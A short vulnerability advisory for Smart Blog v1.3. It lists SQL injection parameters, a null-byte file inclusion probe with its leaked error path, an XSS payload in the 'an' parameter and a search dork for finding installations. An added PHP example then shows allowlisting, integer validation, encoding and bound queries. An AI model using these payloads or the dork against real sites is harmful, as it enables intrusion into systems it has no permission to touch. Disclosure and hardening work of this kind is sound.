Smart Blog v 1.3 Multi Vulnerability

2018.02.16
indoushka (DZ)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=================================================================
| # Title     : Smart Blog v 1.3 Multi Vulnerability
| # Author    : indoushka
| # email     : indoushka4ever@gmail.com
| # Dork      : Actionnée par smartblog
| # Tested on : windows 8.1 Français V.(Pro)
| # Bug       : Multi
| # Download  : http://www.p30vel.ir
=================================================================

SQL injection :

http://127.0.0.1/tst/index.php?jour=22&mois=10&an=2014 (inject here)
http://127.0.0.1/tst/index.php?idt=1 (inject here)

File inclusion :

URL encoded GET input page was set to 1some_inexistent_file_with_long_name%00.html

Error message found:

<b>Warning</b>: fopen(template/default/html/tpl_1some_inexistent_file_with_long_name%00.html) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: No such file or directory in <b>C:\AppServ\www\tst\lib\template.php</b> on line <b>4</b>

/tst/?page=1some_inexistent_file_with_long_name%2500.html

Xss :

/tst/?an=2014%22%20onmouseover%3dprompt(900632)%20bad%3d%22&mois=11

Greetz :
----------------------------------------------------------------------------------------
| jericho * Larry W. Cashdollar * 9aylas * djroot.dz * Gjoko 'LiquidWorm' Krstic |
=================================================================
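Added example (not part of the original advisory and not Smart Blog code): server-side handling for the parameters listed above, with an allowlist for `page`, integer validation for `jour`/`mois`/`an`/`idt`, output encoding, and a bound query. Function names, the `posts` table and the in-memory SQLite database are assumptions made so the sketch runs on its own.

```php
<?php
// Added example; function, table and column names are hypothetical.

// `page` ends up in template/default/html/tpl_<page>.html, so accept only
// a short name made of letters, digits, '_' and '-'.
function safe_template_path(string $page, string $dir): ?string
{
    // '.', '/', '\', '%' and NUL are all outside the allowlist.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    return $dir . '/tpl_' . $page . '.html';
}

// jour, mois, an and idt are numbers: validate type and range.
function int_param(array $q, string $key, int $min, int $max): ?int
{
    $v = filter_var($q[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// Encode before echoing into HTML text or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed requests mirroring the inputs shown in the advisory.
$dir = 'template/default/html';
var_dump(safe_template_path("1some_inexistent_file_with_long_name\0.html", $dir));
var_dump(safe_template_path('home', $dir));

$q = ['an' => '2014" onmouseover=prompt(900632) bad="', 'mois' => '11', 'idt' => '1'];
var_dump(int_param($q, 'an', 1970, 2100));  // not an integer, so rejected
var_dump(int_param($q, 'mois', 1, 12));
echo h($q['an']), "\n";                     // quotes are entity-encoded

// A validated integer is still bound, never concatenated into the SQL text.
$pdo = new PDO('sqlite::memory:');          // stand-in for the blog database
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO posts VALUES (1, 'hello')");
$stmt = $pdo->prepare('SELECT title FROM posts WHERE id = :id');
$stmt->execute([':id' => int_param($q, 'idt', 1, PHP_INT_MAX)]);
var_dump($stmt->fetchColumn());
```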

